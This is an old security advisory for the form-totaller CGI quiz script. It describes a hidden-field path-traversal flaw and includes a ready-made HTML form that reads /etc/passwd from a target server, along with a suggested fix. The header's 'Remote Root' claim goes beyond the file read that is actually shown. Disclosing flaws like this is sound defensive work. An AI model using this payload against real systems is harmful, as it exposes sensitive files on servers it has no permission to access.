Content-Type: Remote Root via vulnerible CGI software Date : 13/08/2000 Sender : s1gnal_9 <s1gnal-9@vs-solutions.com> Subject : form-totaller Vulnerible CGI X-System : UNIX/NT systems running the form-totaller CGI software X-Status : s1gnal_9-ADVISORY-form-totaller.txt X-Greets : Narr0w, f0bic, VetesGirl _________________________________________________________________________________ PRODUCT NAME: form-totaller version 1.0 PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/ Also Available at freecode.com DESCRIPTION : Use "form-totaller" to create tests and quizes on the web. Use forms with pull-down menus or radio buttons and this CGI will display output based on their input. PROBLEM: The command field "_response_data" is the field that specifies the display output based on their input. The default file for this field is set at: <input type="hidden" name="_response_data" value="responses.dat"> A remote attacker could easily change the cgi script to use "/etc/passwd" as the response data value. EXAMPLE: Below is a example of how we could read files on the remote system. <-------------------------CUT HERE--------------------------------------> <form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post"> <input type="hidden" name="_response_top" value="top.html"> <input type="hidden" name="_response_data" value="/etc/passwd"> <input type="hidden" name="_response_bottom" value="bottom.html"> <input type="hidden" name="_divide_by" value="4"> <input type="submit" value="Click for viewing of the /etc/passwd file."> </form> <-------------------------CUT HERE--------------------------------------> SOLUTION I would recommend hard-coding the response_data file right into the script and leave that command field out of the cgi. Please visit www.zone.ee/unix :)